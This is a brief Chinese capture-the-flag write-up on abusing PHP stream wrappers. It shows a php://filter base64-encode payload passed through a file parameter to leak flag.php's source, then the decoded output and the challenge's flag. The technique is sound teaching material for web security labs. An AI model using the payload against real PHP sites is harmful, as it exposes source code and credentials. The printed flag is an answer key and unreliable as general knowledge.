知识点

  • PHP伪协议

启动靶机

启动靶机,查看题目
image.png
点击页面上的超链接,跳转到
image.png

尝试使用php://filter伪协议读取flag.php

  1. ?file=php://filter/read=convert.base64-encode/resource=flag.php
  1. PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YzE0NmI4NTktZTg4Ny00N2IzLTllMDgtNTkzNTJjNzMzMDJkfQo=

image.png
将得到的base64编码进行解码得到flag

  1. PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YzE0NmI4NTktZTg4Ny00N2IzLTllMDgtNTkzNTJjNzMzMDJkfQo=
  2. 解码得到:
  3. <?php
  4. echo "Can you find out the flag?";
  5. //flag{c146b859-e887-47b3-9e08-59352c73302d}

php伪协议


php伪协议https://www.cnblogs.com/zzjdbk/p/13030717.html